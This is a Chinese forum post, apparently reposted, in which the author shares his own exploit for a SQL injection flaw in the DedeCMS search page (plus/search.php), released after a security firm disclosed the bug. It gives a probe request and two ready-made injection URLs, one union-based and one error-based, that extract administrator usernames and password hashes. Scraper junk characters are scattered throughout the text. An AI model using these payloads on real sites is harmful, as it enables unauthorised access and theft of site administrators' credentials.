转载不加作者名的没JJ0 ?: O4 a J4 L" J& d3 \
* M& S3 B1 R4 v. w7 @/ P* c哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
" e, b; F! V1 h7 b
- n) ?! b% t! n$ G0 G* T既然已经发出来了,我就把我自己搞的exp发下吧。。唉。- v. j5 E0 Z% v0 W# b3 }/ C
$ w4 V0 _0 i/ u' w' o# [
我一般是这样测试的:! f0 t; V, T0 Z8 R/ K- d
4 F1 u6 B! b8 y9 i提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
7 E2 R5 v' R, q' q4 ]7 a
( _9 a2 W6 g4 U3 k- M/ N转载不加作者名的没JJ0 V {+ w$ a) i7 f1 e
. A# E7 W& @8 z F作者:鬼哥
5 | ^1 D# t, W' v2 I
& m2 H) q) ^2 _' b( v7 o 1 k O* a$ [; h" h; r* P: \* W0 ~
6 N% ^$ ^2 Y+ f5 y) A. f5 p" a& x7 y4 z看结果如果提示 D: l/ F! r; b" ]8 i
& r* D" U# O1 J! d
Safe Alert: Request Error step 2 !
2 ~6 K; m8 t& s3 r0 c _$ \! b9 I/ Q9 _* \8 Y$ P
那么直接用下面的exp
+ }' k! p% j, ^. p6 x# D5 X& V9 ]3 d, K: f+ Z# L& `6 D4 Q! m
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a9 V! v3 N1 g' G7 Z( |
) g9 D6 v/ x/ z2 d0 S2 l @' D; m
$ g! d9 ~2 ~% z# C. w" ^: z看结果如果提示
2 d; p% y6 E5 t" l6 n. Y
* J) z* Q4 y& |; I U, qSafe Alert: Request Error step 1 !: [% ?* ^2 b* b* q, r
. Q( e# |% k# w" N* R. m那么直接用下面的exp/ f* N- h& Y' j0 f( p% Q( p0 h
+ W& ~8 |" X9 P1 nxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
% M# E$ Y5 ^& A3 g# F0 U: S2 x: p: \) ^' a$ S, R+ a
2 u6 z `$ C' `; g) l如果正常显示证明漏洞不存在了。
5 R0 ]& w2 [, {' C% O B2 V5 `7 q2 s$ q& X" T1 b; H4 L2 \1 B
转载不加作者名的没JJ |